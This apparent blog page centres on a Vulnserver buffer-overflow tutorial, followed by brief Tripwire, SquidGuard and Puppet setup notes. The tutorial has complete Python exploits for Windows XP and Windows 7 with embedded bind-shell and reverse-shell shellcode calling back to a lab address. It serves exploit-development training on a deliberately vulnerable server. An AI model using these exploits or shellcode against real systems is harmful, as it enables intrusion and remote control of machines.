Security Exposed

Tuesday, 1 May 2018

Exploiting Vulnserver

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Vulnserver and exploit writing PoC:

I had some free time. So I set back to exercise on Vulnserver. This is a short tutorial on how to write an exploit for Vulnserver for both XP SP3 and Windows 7.

The process is pretty straight forward:
1. We have to determine where the overflow happens for the purpose we use a pattern of non-repeatable characters.

#/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5050

import socket
# Place the pattern here
pattern = ""

try:
# while True:
# open a connection to vulnserver
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect (("192.168.1.26", 9999))

# receive the banner for vulnserver
s.recv (1024)

s.send ("TRUN /.:/" + pattern + " \r\n")

# receive the response from vulnserver
s.recv (1024)

# close the connection
s.close ()
except:
# if we get to here then something happened to vulnserver because the connection is closed
print "Socket closed "
#

#

2. To get the exact location for the offset we search for the characters that we last saw in the stack.

#/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 8co9

#[*] No exact matches, looking for likely candidates...
#[+] Possible match at offset 446 (adjusted [ little-endian: 8704 | big-endian: 19788799 ] ) byte offset 1
#[+] Possible match at offset 1226 (adjusted [ little-endian: 8448 | big-endian: 19723263 ] ) byte offset 1
#[+] Possible match at offset 2006 (adjusted [ little-endian: 8192 | big-endian: 19657727 ] ) byte offset 1
#[+] Possible match at offset 2786 (adjusted [ little-endian: 7936 | big-endian: 19592191 ] ) byte offset 1
#[+] Possible match at offset 3566 (adjusted [ little-endian: 7680 | big-endian: 19526655 ] ) byte offset 1
#[+] Possible match at offset 4346 (adjusted [ little-endian: 7424 | big-endian: 19461119 ] ) byte offset 1
#[+] Possible match at offset 5126 (adjusted [ little-endian: 7168 | big-endian: 19395583 ] ) byte offset 1
#[+] Possible match at offset 5906 (adjusted [ little-endian: 6912 | big-endian: 19330047 ] ) byte offset 1
#[+] Possible match at offset 6686 (adjusted [ little-endian: 6656 | big-endian: 19264511 ] ) byte offset 1

#[+] Possible match at offset 7466 (adjusted [ little-endian: 6400 | big-endian: 19198975 ] ) byte offset 1

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6F43376F

[*] Exact match at offset 2002

I checked manually the offset and the exact location was 2006

For reference this was the pattern:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2G

3. After we determine the offset we have to determine the bad characters in our case the \x00

We use this script below to determine a bad char:
#!/usr/bin/python
import socket
server = '192.168.1.26'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0, 256):
testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)

s.close()

When we tests with the \x00 we get an access violation at 45444342 the last that we get written is BCDE - so \x00 is a bad char.

To skip \x00 we change the range of characters to (1,256). I saw that after skipping the bad char there were chars going to the stack.

4. We will need to jump to an ESP register where we can inject our exploitation code.

For XP I used findjmp to find a ESP that is directly to KERNEL32.DLL:
https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin

Both USER32 and KERNEL32 are usable:
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp

#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0 call esp
#0x7C86467B jmp esp
#0x7C868667 call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register

For Windows 7 I used mona to find an ESP in essfunc.dll since it is not ASLR protected:

!mona find -s "\xff\xe4" -m essfunc.dll

5. The payload:

For Windows XP I used a bind shell, this did not work on Windows 7:

#/usr/share/framework2

./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"

For Windows 7 I determined that the working variant was a reverse shell with msfvenom:

#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00'

Exploit for Vulnserver on Windows XP:
import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.27'
SER_PORT = 9999

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)
#Possible Registers for usage on XP SP3
#https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp
#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0 call esp
#0x7C86467B jmp esp
#0x7C868667 call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register
message = '\x41' * 2006 + '\x67\x86\x86\x7c' #CALL ESP that we chose
message += '\x90' * 16

#/usr/share/framework2
#./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"
message +=(
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef\x4d\x96"
"\x95\x83\xeb\xfc\xe2\xf4\x13\x27\x7d\xd8\x07\xb4\x69\x6a\x10\x2d"
"\x1d\xf9\xcb\x69\x1d\xd0\xd3\xc6\xea\x90\x97\x4c\x79\x1e\xa0\x55"
"\x1d\xca\xcf\x4c\x7d\xdc\x64\x79\x1d\x94\x01\x7c\x56\x0c\x43\xc9"
"\x56\xe1\xe8\x8c\x5c\x98\xee\x8f\x7d\x61\xd4\x19\xb2\xbd\x9a\xa8"
"\x1d\xca\xcb\x4c\x7d\xf3\x64\x41\xdd\x1e\xb0\x51\x97\x7e\xec\x61"
"\x1d\x1c\x83\x69\x8a\xf4\x2c\x7c\x4d\xf1\x64\x0e\xa6\x1e\xaf\x41"
"\x1d\xe5\xf3\xe0\x1d\xd5\xe7\x13\xfe\x1b\xa1\x43\x7a\xc5\x10\x9b"
"\xf0\xc6\x89\x25\xa5\xa7\x87\x3a\xe5\xa7\xb0\x19\x69\x45\x87\x86"
"\x7b\x69\xd4\x1d\x69\x43\xb0\xc4\x73\xf3\x6e\xa0\x9e\x97\xba\x27"
"\x94\x6a\x3f\x25\x4f\x9c\x1a\xe0\xc1\x6a\x39\x1e\xc5\xc6\xbc\x1e"
"\xd5\xc6\xac\x1e\x69\x45\x89\x25\x93\xb4\x89\x1e\x1f\x74\x7a\x25"
"\x32\x8f\x9f\x8a\xc1\x6a\x39\x27\x86\xc4\xba\xb2\x46\xfd\x4b\xe0"
"\xb8\x7c\xb8\xb2\x40\xc6\xba\xb2\x46\xfd\x0a\x04\x10\xdc\xb8\xb2"
"\x40\xc5\xbb\x19\xc3\x6a\x3f\xde\xfe\x72\x96\x8b\xef\xc2\x10\x9b"
"\xc3\x6a\x3f\x2b\xfc\xf1\x89\x25\xf5\xf8\x66\xa8\xfc\xc5\xb6\x64"
"\x5a\x1c\x08\x27\xd2\x1c\x0d\x7c\x56\x66\x45\xb3\xd4\xb8\x11\x0f"
"\xba\x06\x62\x37\xae\x3e\x44\xe6\xfe\xe7\x11\xfe\x80\x6a\x9a\x09"
"\x69\x43\xb4\x1a\xc4\xc4\xbe\x1c\xfc\x94\xbe\x1c\xc3\xc4\x10\x9d"
"\xfe\x38\x36\x48\x58\xc6\x10\x9b\xfc\x6a\x10\x7a\x69\x45\x64\x1a"
"\x6a\x16\x2b\x29\x69\x43\xbd\xb2\x46\xfd\x1f\xc7\x92\xca\xbc\xb2"
"\x40\x6a\x3f\x4d\x96\x95")

my_sock.send(('TRUN .' + message + '\r\n'))

print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()

Exploit for Vulnserver on Windows 7:
import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.26'
SER_PORT = 9999

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)

prefix = '\x41' * 2006
esp = '\xaf\x11\x50\x62' #CALL ESP that we chose
nopsled = '\x90' * 16

#!mona find -s "\xff\xe4" -m essfunc.dll
#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' <-works
payload =(
"\xdd\xc5\xd9\x74\x24\xf4\xb8\x84\x6e\x28\xf3\x5a\x33\xc9\xb1"
"\x52\x31\x42\x17\x03\x42\x17\x83\x46\x6a\xca\x06\xba\x9b\x88"
"\xe9\x42\x5c\xed\x60\xa7\x6d\x2d\x16\xac\xde\x9d\x5c\xe0\xd2"
"\x56\x30\x10\x60\x1a\x9d\x17\xc1\x91\xfb\x16\xd2\x8a\x38\x39"
"\x50\xd1\x6c\x99\x69\x1a\x61\xd8\xae\x47\x88\x88\x67\x03\x3f"
"\x3c\x03\x59\xfc\xb7\x5f\x4f\x84\x24\x17\x6e\xa5\xfb\x23\x29"
"\x65\xfa\xe0\x41\x2c\xe4\xe5\x6c\xe6\x9f\xde\x1b\xf9\x49\x2f"
"\xe3\x56\xb4\x9f\x16\xa6\xf1\x18\xc9\xdd\x0b\x5b\x74\xe6\xc8"
"\x21\xa2\x63\xca\x82\x21\xd3\x36\x32\xe5\x82\xbd\x38\x42\xc0"
"\x99\x5c\x55\x05\x92\x59\xde\xa8\x74\xe8\xa4\x8e\x50\xb0\x7f"
"\xae\xc1\x1c\xd1\xcf\x11\xff\x8e\x75\x5a\x12\xda\x07\x01\x7b"
"\x2f\x2a\xb9\x7b\x27\x3d\xca\x49\xe8\x95\x44\xe2\x61\x30\x93"
"\x05\x58\x84\x0b\xf8\x63\xf5\x02\x3f\x37\xa5\x3c\x96\x38\x2e"
"\xbc\x17\xed\xe1\xec\xb7\x5e\x42\x5c\x78\x0f\x2a\xb6\x77\x70"
"\x4a\xb9\x5d\x19\xe1\x40\x36\xe6\x5e\x4b\xc9\x8e\x9c\x4b\xc4"
"\x12\x28\xad\x8c\xba\x7c\x66\x39\x22\x25\xfc\xd8\xab\xf3\x79"
"\xda\x20\xf0\x7e\x95\xc0\x7d\x6c\x42\x21\xc8\xce\xc5\x3e\xe6"
"\x66\x89\xad\x6d\x76\xc4\xcd\x39\x21\x81\x20\x30\xa7\x3f\x1a"
"\xea\xd5\xbd\xfa\xd5\x5d\x1a\x3f\xdb\x5c\xef\x7b\xff\x4e\x29"
"\x83\xbb\x3a\xe5\xd2\x15\x94\x43\x8d\xd7\x4e\x1a\x62\xbe\x06"
"\xdb\x48\x01\x50\xe4\x84\xf7\xbc\x55\x71\x4e\xc3\x5a\x15\x46"
"\xbc\x86\x85\xa9\x17\x03\xb5\xe3\x35\x22\x5e\xaa\xac\x76\x03"
"\x4d\x1b\xb4\x3a\xce\xa9\x45\xb9\xce\xd8\x40\x85\x48\x31\x39"
"\x96\x3c\x35\xee\x97\x14"
)

message = prefix + esp + nopsled + payload + 'C' * (3000-len(prefix)-len(esp)-len(nopsled)-len(payload))
my_sock.send(('TRUN .' + message + '\r\n'))

print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()

References:
https://samsclass.info/127/proj/vuln-server.htm
http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/
http://www.rockfishsec.com/2014/01/fuzzing-vulnserver-with-python.html

Friday, 27 April 2018

Installing Tripwire on Suse

First we have to get tripwire:

https://software.opensuse.org/download.html?project=security&package=tripwire

In my case:

zypper addrepo http://download.opensuse.org/repositories/security/SLE_12_SP2/security.repo

zypper refresh

zypper install tripwire

twadmin --generate-keys --local-keyfile /etc/tripwire/$HOSTNAME-local.key

twadmin --create-cfgfile -S /etc/tripwire/site.key /etc/tripwire/twcfg.txt

In /etc:

cp twcfg.txt tw.cfg

cp twpol.txt te.pol

Create twpol.txt if it does not exist:

# Begin twpol.txt

(

rulename = "Tripwire Data Files",

severity = 100

)

{

/var/lib/tripwire -> $(Dynamic) -i ;

/var/lib/tripwire/report -> $(Dynamic) (recurse=0) ;

}

(

rulename = "Root & Home",

severity = 100

)

{

/ -> $(IgnoreAll) (recurse=1) ;

/home -> $(IgnoreAll) (recurse=1) ;

}

(

rulename = "System Directories",

severity = 100

)

{

/bin -> $(IgnoreNone)-SHa ;

/boot -> $(IgnoreNone)-SHa ;

/etc -> $(IgnoreNone)-SHa ;

/lib -> $(IgnoreNone)-SHa ;

/opt -> $(IgnoreNone)-SHa ;

/root -> $(IgnoreNone)-SHa ;

/sbin -> $(IgnoreNone)-SHa ;

/usr -> $(IgnoreNone)-SHa ;

}

# End twpol.txt

twadmin --create-polfile -S site.key /etc/tripwire/twpol.txt

tripwire --init

tripwire --check

tripwire --check --interactive

References:

https://software.opensuse.org/download.html?project=security&package=tripwire

http://www.linuxquestions.org/questions/linux-from-scratch-13/a-really-simple-tripwire-policy-file-for-blfs-4175437121/

http://stuff.is-a-geek.net/OnlineDocs/Linux/Intelhelp/distros/suse/tripwire.html

https://uk.godaddy.com/help/how-to-set-up-tripwire-on-centos-12389

Thursday, 19 April 2018

Installing SquidGuard on CentOS 7.x

Get Berkeley DB 4.6.21:
wget http://download.oracle.com/berkeley-db/db-4.6.21.tar.gz

cd db-46..
cd build_unix
../dist/configure

make

make install

ln -s /usr/local/BerkeleyDB.4.6 /usr/local/BerkeleyDB

export LD_RUN_PATH=/usr/local/BerkeleyDB/lib ./configure

./configure

make

make install

Get the blacklist form here:
http://www.shalla.de/service.html

Create static lists to squidGuard db:

ln -s /opt/3rdparty/BL/anonvpn /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/hacking /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/dating /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/gamble /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/movies /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/music /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/porn /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/sex /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/spyware /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/tracker /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/urlshortener /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/violence /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/warez /usr/local/squidGuard/db

ln -s /opt/3rdparty/BL/weapons /usr/local/squidGuard/db

SquidGuard configuration:

dbhome /usr/local/squidGuard/db
logdir /usr/local/squidGuard/log

dest anonvpn{
         log             anonvpn
         domainlist      anonvpn/domains
         urllist         anonvpn/urls
 }

dest hacking{
         log             hacking
         domainlist      hacking/domains
         urllist         hacking/urls
 }

dest dating{
         log             dating
         domainlist      dating/domains
         urllist         dating/urls
 }


dest gamble{
         log             gamble
         domainlist      gamble/domains
         urllist         gamble/urls
 }

dest movies{
         log             movies
         domainlist      movies/domains
         urllist         movies/urls
 }

dest music{
         log             music
         domainlist      music/domains
         urllist         music/urls
 }

dest porn{
         log             porn
         domainlist      porn/domains
         urllist         porn/urls
 }



dest spyware{
         log             spyware
         domainlist      spyware/domains
         urllist         spyware/urls
 }

dest tracker{
         log             tracker
         domainlist      tracker/domains
         urllist         tracker/urls
 }

dest urlshortener{
         log             urlshortener
         domainlist      urlshortener/domains
         urllist         urlshortener/urls
 }

dest violence{
         log             violence
         domainlist      violence/domains
         urllist         violence/urls
 }

dest warez{
         log             warez
         domainlist      warez/domains
         urllist         warez/urls
 }

dest weapons{
         log             weapons
         domainlist      weapons/domains
         urllist         weapons/urls
 }

acl {
  default {
   pass !anonvpn !hacking !dating !gamble !movies !music !porn !spyware !tracker !urlshortener !violence !warez !weapons all
   redirect 302:http://www.google.com
  }
 }

Switch of SELinux /etc/sysconfig/selinux, enter:
# vi /etc/sysconfig/selinux

And set / update it as follows:
SELINUX=disabled

chkconfig squid on

You will have to compile the lists in order for squidGuard to work with them. Removing and compiling stuff from the DB:
cd /usr/local/squidGuard/db
grep -r "example.com"
/usr/local/bin/
./squidGuard -C movies/domains
service squid restart

In Squid config:
# Try connecting to first 25 ips of domain name
forward_max_tries 25
#squidGuard
redirect_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
url_rewrite_bypass off
url_rewrite_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
#debug_options ALL,1 29,1

Wednesday, 18 April 2018

Puppet Picks

Some great puppet picks if you want to use Puppet or write modules to it or install Foreman.

Modules:
https://forge.puppet.com/ghoneycutt?utf-8=%E2%9C%93&sort=&page=3
https://forge.puppet.com/saz/rsyslog
https://forge.puppet.com/puppetlabs/firewall
https://forge.puppet.com/razorsedge/network
https://www.youtube.com/channel/UC_BpuLm5IvV2tme4WSHEdgw
https://wiki.infn.it/progetti/cloud-areapd/best_practices/config_puppetrun

Writing modules:
http://www.bogotobogo.com/DevOps/Puppet/puppet_locking_user_accounts_deploying_sudoers_file.php
https://www.linode.com/docs/applications/puppet/create-puppet-module
